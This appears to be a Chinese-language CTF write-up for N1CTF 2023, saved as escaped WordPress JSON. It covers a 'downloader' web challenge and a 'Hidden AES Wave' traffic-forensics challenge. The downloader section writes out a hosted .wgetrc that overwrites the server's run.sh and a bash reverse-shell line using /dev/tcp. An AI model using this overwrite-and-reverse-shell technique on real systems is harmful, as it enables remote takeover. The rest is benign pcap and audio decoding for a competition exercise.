\u5927\u6982\u5c31\u662f\u5148\u7528downloader\u4e0b\u8f7dvps\u4e0a\u6258\u7ba1\u7684.wgetrc\uff0c\u7136\u540e.wgetrc\u91cc\u9762\u662foutput_document\u53ef\u4ee5\u5bfc\u81f4\u6587\u4ef6\u8986\u76d6<\/p>\n
\u8d77\u4e86docker\u770b\u4e00\u4e0b\uff0c\u4f3c\u4e4e\u80fd\u8986\u76d6\u7684\u4e0d\u591a\uff0cwget\u662f\u8986\u76d6\u4e0d\u4e86\u7684\uff0c\u4e8e\u662f\u8f6c\u53d8\u601d\u8def\uff0c\u53ef\u4ee5\u53bb\u8986\u76d6\/app\u4e0b\u7684pwn\u6216\u8005run.sh\uff0c\u8fd9\u91cc\u9009\u62e9\u8986\u76d6run.sh<\/p>\n
vps\u6258\u7ba1.wgetrc\u5185\u5bb9\u5982\u4e0b<\/p>\n
output_document=\/app\/run.sh<\/code><\/pre>\n\u4ee5\u53ca\u53cd\u5f39shell\u7684\u811a\u672c<\/p>\n
#!\/bin\/bash\n\nbash -c "bash -i >& \/dev\/tcp\/ip\/port 0>&1"<\/code><\/pre>\n\u7136\u540e\u5148\u4e0b\u8f7d.wgetrc\uff0c\u9000\u51fa\uff0c\u518d\u4e0b\u8f7d\u53cd\u5f39shell\u811a\u672c<\/p>\n
\u518d\u9000\u51fa\uff0cvps\u76d1\u542c\u7aef\u53e3\uff0c\u7136\u540enc\u9898\u76ee\u5373\u53ef\u6536\u5230shell<\/p>\n
Hidden AES Wave<\/h2>\n
\u6d41\u91cf\u91cc\u9762\u4e00\u5806wav\uff0c\u4f3c\u4e4e\u662f11111\u548c22222\u7aef\u53e3\u95f4\u7684\u67d0\u79cd\u901a\u4fe1\uff0c\u76f4\u63a5tshark\u63d0\u53d6<\/p>\n
tshark -r challenge.pcapng -T fields -Y "udp and \\!icmp" -e udp.payload | sed '\/^\\s*$\/d' > 1.txt<\/code><\/pre>\ncyberchef\u91cc\u518d\u8f6c\u4e00\u4e0b\uff0c\u7136\u540eforemost\u5f97\u5230\u6240\u6709\u7684\u97f3\u9891<\/p>\n
audacity\u7b80\u5355\u770b\u770b\uff0c\u91cc\u9762\u662f\u4e8c\u8fdb\u5236\u4f20\u8f93\u6570\u636e\u5e76\u4e14\u6bcf\u4e03\u4f4d\u4e00\u4e2a\u5b57\u7b26<\/p>\n
\u76f4\u63a5\u5199\u811a\u672c<\/p>\n
import os\n\ndef check(text):\n for i in range(1,len(text)-1):\n if(text[i-1] + text[i+1] == '{}'):\n print(text[i])\n\ndef get(flag):\n sig = "1"\n cnt = 0\n flagg = ''\n text = ''\n cnnt = 0\n\n for i in flag:\n if(i != sig):\n sig = i\n if(sig == '0'):\n if(cnt == 48 or cnt == 72):\n flagg+="1"\n cnt = 0\n elif(cnt == 16 or cnt == 24):\n flagg+='0'\n cnt = 0\n elif(sig == '1'):\n cnt = 0\n cnt += 1\n for i in range(0,len(flagg),7):\n data = flagg[i:i+7]\n text += chr(int(data,2))\n print(text)\n if(text.startswith('Roger!')):\n #print(text)\n return\n check(text)\n\ndef analysis(file):\n f = open(file, 'rb').read()\n f = f[44:]\n flag = ''\n for i in range(len(f)\/\/4):\n data = f[4*i:4*i+4]\n if(data != b'\\x00\\x00\\x00\\x00'):\n flag += '1'\n else:\n flag += '0'\n get(flag)\n\nfiles = os.listdir('.\/wav')\nfor file in files:\n analysis('.\/wav\/' + file)<\/code><\/pre>\n\u5f97\u5230\u6240\u6709\u4fe1\u606f<\/p>\n
With re{Z}spect to now, solving secret communication is becoming a more and more significant issue, by contrasts, if secret communication takes place in our daliy life, we have to consider its consequence.\n\nRoger!\nOn the one hand, the consequece of secret comm{J}unication is of great significance to me, and to many other people.\n\nRoger!\nIt is disappointing that, secret communication has become increasingly evident among teens according to many scientists, alternatively, as this subjec{o}t continues to be looked down on people must realize that secret communication are becoming more common in today's world.\n\nRoger!\nIt is disappointing that, as this subject continues to be looked down on people must realize that secret communication are{X} becoming more common in today's world.\n\nRoger!\nChiefly, jacqueline Carey, kushiel{M}'s Dart concluded that, that which yields is not always weak.\n\nRoger!\nThat solved my prob{M}lem.\n\nRoger!\nThat is to say,{x} david Mamet mentioned that, it's only words.. unless they're true.\n\nRoger!\nTha{K}t inspired me.\n\nRoger!\nIn addition, does the government provide help for secret communication{E}? Furthermore, with these questions, let's take a closer look to secret communication.\n\nRoger!\nSince that is so, if we think about it from a different point of view, moreover, what is the key point of secret communication? In comparison{I}, for secret communication, the key point is how to express secret communication.\n\nRoger!\nIn particular, rebecca West attemptted to convince the reader that, the trouble abo{x}ut man is twofold.\n\nRoger!\nHe cannot learn truths which are too complicated; he forgets truths which are too{e} simple.\n\nRoger!\nWhich brought a new way of thinkin{X}g it.\n\nRoger!\nIn addition, what is the{5} key point of secret communication? In particular, rebecca McClanahan ,the shortest distance between two points is always under construction. Which enlighten me.\n\nRoger!\nBesides, if we think about it from a different point of view, however, under this inevitable circumstance situation, we have to solve secret comm{d}unication.\n\nRoger!\nOn the one hand, to a certain extent, secret communication is right.{A}\n\nRoger!\nAnother possibility is, now, solving secret communication is becoming a more and more significant issue, {E}above all, what could we do anyway to ahchieve secret communication.\n\nRoger!\nFurthermore, for many years, people with secret communication have{w} been viewed as different.\n\nRoger!\nIn comparison, the problem lies in the difference of people raised by secre{8}t communication, It is disappointing that, after seeing this evidence, there is no way we can agree with secret communication.\n\nRoger!\nWith respect to What is the key point of secret communication? In comparison, if secret communicati{w}on takes place in our daliy life, we have to consider its consequence.\n\nRoger!\nIn fact, opponents of secret communication cl{B}aim that, in that case, we have to face an embarrassing situation, that is, another way of viewing this is, for me, the emergent rise of secret communication may change my life.\n\nRoger!\nBesides, for secret communication, the key point is how to express secret communicat{P}ion.\n\nRoger!\nIn addition, what is the key point of secret communica{b}tion? However, as this subject continues to be looked down on people must realize that secret communication are becoming more common in today's world.\n\nRoger!\nTo look at another wa{w}y, secret communication continues to be a relevant controversial issue in society today, as However, what should we do to give rise to secret communication, and what should we do to prevent secret communication's happening.\n\nRoger!\nAnother possibility is, secret communication continues to be a relevant controversial issue in society today, as That is to say, emil Cioran ,melancholy: an appetite no misery {F}satisfies. Which enlighten me.\n\nRoger!\nSince that is so, what should we do to give rise to secret communication, and what should we do to prevent secret communic{4}ation's happening.\n\nRoger!\nBy contrasts, the evidence presented in this assignment has shown that, in other words, as this subject continues to be looked down on peop{7}le must realize that secret communication are becoming more common in today's world.\n\nRoger!\nThat is to say, according to Napoleon Bonaparte, if you want a thing done well, do it yourself. {X}Which enlighten me.\n\nRoger!\nWith respect to what should we do to give rise to secret communication, and what sh{8}ould we do to prevent secret communication's happening.\n\nRoger!\nIn comparison, if secret communication takes place in our daliy life, we have to consider its con{P}sequence.\n\nRoger!\nTo look at another way, some people may disagree with secret communication, furthermore, opponents of secret communication claim that, that is to say, rebecca McClanahan showed us that, the shortest distance between two poin{0}ts is always under construction. That solved my problem.\n\nRoger!\nIn addition, if secret communication takes {3}place in our daliy life, we have to consider its consequence.\n\nRoger!\nFurtherm{3}ore, when facing this difficult choice of secret communication, i rarely slept well.\n\nRoger!\nMoreover,{i} is inevitable.\n\nRoger!\nBy contrasts, what is the key point of secret communication? For example, franz Kafka ,if a man has his eyes bound, you can en{I}courage him as much as you like to stare through the bandage, but he'll never see anything.\n\nRoger!\nWhich brought a new way of thinking it.Chiefly, to quote from Friedrich Nietzsche, i hav{W}e forgotten my umbrella. Which enlighten me.\n\nRoger!\nHowever, but these are not the most urgent issue, a more pressing issue about secret communication is, furthermore, from my piont {z}of view, secret communication means a lot to me, and Moreover, as this subject continues to be looked down on people must realize that secret communication are becoming more common in today's world.\n\nRoger!\nFor example, david Mamet concluded that, it's only words.. unless they're true. That inspired{i} me.\n\nRoger!\nIn addition, now, solving secret communication is becoming a more and more significant issue, alternatively, se{L}veral studies of the effects of secret communication on the human systems have failed to demonstrate these effects.\n\nRoger!\nTo look at another way, we generally say, if we grasped the key of the problem of secret communication, everthing else wi{I}ll be easily solved.\n\nRoger!\nAbove all, for me, the emergent r{9}ise of secret communication may change my life.\n\nRoger!\nFurthermore, we hav{k}e been thinking about secret communication for a long time.With respect to In my opinion, however, several studies of the effects of secret communication on the human systems have failed to demonstrate these effects.\n\nFurthermore, we hav{k}e been thinking about secret communication for a long time.With respect to In my opinion, however, several studies of the effects of secret communication on the human systems have failed to demonstrate these effects.\n\nRoger!\nC{Z}hiefly, rebecca West concluded that, the trouble about man is twofold.\n\nRoger!\nHe cannot learn truths which a{6}re too complicated; he forgets truths which are too simple.\n\nRoger!\nThat aroused my imaginatio{R}n.\n\nRoger!\nIn other words, one of the longest standing arguments against the use of secret communication is that, moreover, one of the longest standing arguments against the use of secret communication is that, besides, one {K}of the longest standing arguments against the use of secret communication is that, similarly, modern vehement arguments against secret communication alone become suspect.\n\nRoger!\nThus, as far as I know, alternatively, why does secret communication ha{K}ppen? Since that is so, for secret communication, the key point is how to express secret communication.\n\nRoger!\nAnother possibility is, one of the longest standing arguments against the use of secret communication is that, on the contrary, more current stu{X}dies of people who take secret communication heavely show no evidence of emotional damage.\n\nRoger!\nIn that {B}case, modern vehement arguments against secret communication alone become suspect.\n\nRoger!\nIn compari{h}son, to a certain extent, secret communication is right.\n\nRoger!\nSince that is so, some people may disagree with secret communication, in fact, now, solving secret communication is becoming a more and more significant issue, to look at another way, we generally say, if we grasped the key of the problem of secret communication, everthing else will be easi{K}ly solved.\n\nRoger!\nIt is important to note that but these are not the most urgent issue, a more press{l}ing issue about secret communication is, thus, after seeing this evidence, there is no way we can agree with secret communication.\n\nRoger!\nTo look at another way, now, solving secret communication is {r}becoming a more and more significant issue, similarly, when facing this difficult choice of secret communication, i rarely slept well.\n\nRoger!\nIn addition, what should we do to give rise to secret communication, and what {s}should we do to prevent secret communication's happening.\n\nRoger!\nFor example{q}, james Thurber attemptted to convince the reader that, all human beings should try to learn before they die what they are running from, and to, and why. Which enlighten me.\n\nRoger!\nOn the other hand, every person has to face these problems caused by secret communication, when facing these problems, that is to say, according to Napoleon Bonaparte, if you want a thing done well, do it {H}yourself. Which enlighten me.\n\nRoger!\nFurthermore, secret communication continues to be a relevant controversial issue in society today, as Another way of viewing this is, does the government provide help for secret communication? Above all, {+}is inevitable.\n\nRoger!\nAlternatively, now, solving secret communication is becoming a more and more significant issue, namely, to quote from Rebecca {i}McClanahan, the shortest distance between two points is always under construction.\n\nRoger!\nWhich broug{3}ht a new way of thinking it.\n\nRoger!\nIn fact, for many years, people{B} with secret communication have been viewed as different. In other words, is inevitable.\n\nRoger!\nThus, secret communication has become{q} increasingly evident among teens according to many scientists, moreover, we have to face an embarrassing situation, that is, for example, kamand Kojouri concluded that, what you choose also chooses you. That inspired me.\n\nRoger! Secret key confirmed.\nIt is disappointing that, but these {v}are not the most urgent issue, a more pressing issue about secret communication is, another way of viewing this is, secret communication is a common condition among civilians in today's society, so, another way of viewing this is, what should we do to give rise to secret communication, and what should we do to prevent secret communication's happening.\n\nRoger!\nFor e{3}xample, to quote from Kamand Kojouri, what you choose also chooses you.\n\nRoger!\nWhich br{T}ought a new way of thinking it.\nRoger! Encrypted text and secret key confirmed.\nRoger! Encrypted text and secret key confirmed.\nRoger! Encrypted text and secret key confirmed.<\/code><\/pre>\n\u5e76\u4e14\u6bcf\u53e5\u8bdd\u91cc\u9762\u90fd\u6709\u4e00\u4e2a{}\u5305\u8d77\u6765\u7684base64\u5b57\u7b26\uff0c\u8fd9\u4e2a\u811a\u672c\u91cc\u4e5f\u63d0\u53d6\u4e86<\/p>\n
ZJoXMMxKEIxeX5dAEw8wBPbwF47X8P033iIWziLI9kkZ6RKKXBhKlrsqH+i3Bqv3T<\/code><\/pre>\n\u4f46\u662f\u6ce8\u610f\u5230\u91cc\u9762\u6709\u4e00\u6bb5\u662f\u53d1\u9001\u4e86\u4e24\u4e2ak\u4f46\u662f\u53ea\u6709\u4e00\u4e2aRoger!\uff0c\u6240\u4ee5\u9700\u8981\u820d\u53bb\u4e00\u4e2ak\uff0c\u53ef\u80fd\u662f\u67d0\u4e9b\u795e\u79d8\u95ee\u9898<\/p>\n
\u6240\u4ee5\u5bc6\u6587\u5e94\u8be5\u662f<\/p>\n
ZJoXMMxKEIxeX5dAEw8wBPbwF47X8P033iIWziLI9kZ6RKKXBhKlrsqH+i3Bqv3T<\/code><\/pre>\n\u7531\u4e8e\u6211\u662fforemost\u62ff\u5230\u7684wav\u6240\u4ee5\u6587\u4ef6\u5c3e\u662f\u6ca1\u6709\u9690\u5199\u7684\uff0c\u8fd9\u91cc\u5361\u4e86\u633a\u4e45\uff0c\u4f46\u662ftshark\u7684\u7ed3\u679c\u91cc\u6709\uff0c\u7531\u4e8eRIFF\u5934\u524d\u9762\u8fd8\u6709\u4e94\u4e2a\u5b57\u8282\u7684\u5947\u5999\u6570\u636e\uff0c\u6240\u4ee5\u518d\u5f80\u524d\u8bfb\u4e00\u4e2a\u5c31\u597d\u4e86\uff0c\u76f4\u63a5\u5199\u811a\u672c\u63d0\u53d6<\/p>\n
import string\nf = open('download.dat', 'rb').read()\nfor i in range(len(f)-4):\n if(f[i:i+4] == b'RIFF'):\n if(chr(f[i-6]) in string.printable):\n print(chr(f[i-6]),end='')<\/code><\/pre>\n\u76f4\u63a5\u62ff\u5230\u5bc6\u7801<\/p>\n
P@$Sw0rd1!Y0uGot<\/code><\/pre>\n\u89e3aes\u5373\u53ef<\/p>\n
![\"\"](\"https:\/\/pic.imgdb.cn\/item\/6535c02cc458853aef03a420.jpg\")
<\/p>\n
welcome to N1CTF 2023<\/h2>\n
![\"\"](\"https:\/\/pic.imgdb.cn\/item\/6535c052c458853aef03e634.jpg\")
<\/p>\n
feedback<\/h2>\n
\u76f4\u63a5\u586b<\/p>\n","protected":false},"excerpt":{"rendered":"
downloader \u641c\u7d22\u540e\u53d1\u73b0\u8fd9\u9898\u8003\u70b9\u4f3c\u4e4e\u548c[*CTF2022 oh-my-lotto]\u7684\u975e\u9884\u671f\u89e3\u76f8\u4f3c\uff0c\u4e8e\u662f\u8bd5\u8bd5\u601d\u8def \u5927\u6982\u5c31\u662f\u5148\u7528downloader\u4e0b\u8f7dvps\u4e0a\u6258\u7ba1\u7684.wgetrc\uff0c\u7136\u540e.wgetrc\u91cc\u9762\u662foutput_document\u53ef\u4ee5\u5bfc\u81f4\u6587\u4ef6\u8986\u76d6 \u8d77\u4e86docker\u770b\u4e00\u4e0b\uff0c\u4f3c\u4e4e\u80fd\u8986\u76d6\u7684\u4e0d\u591a\uff0cwget\u662f\u8986\u76d6\u4e0d\u4e86\u7684\uff0c\u4e8e\u662f\u8f6c\u53d8\u601d\u8def\uff0c\u53ef\u4ee5\u53bb\u8986\u76d6\/app\u4e0b\u7684pwn\u6216\u8005run.sh\uff0c\u8fd9\u91cc\u9009\u62e9\u8986\u76d6run […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-284","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=284"}],"version-history":[{"count":2,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/284\/revisions"}],"predecessor-version":[{"id":287,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/284\/revisions\/287"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}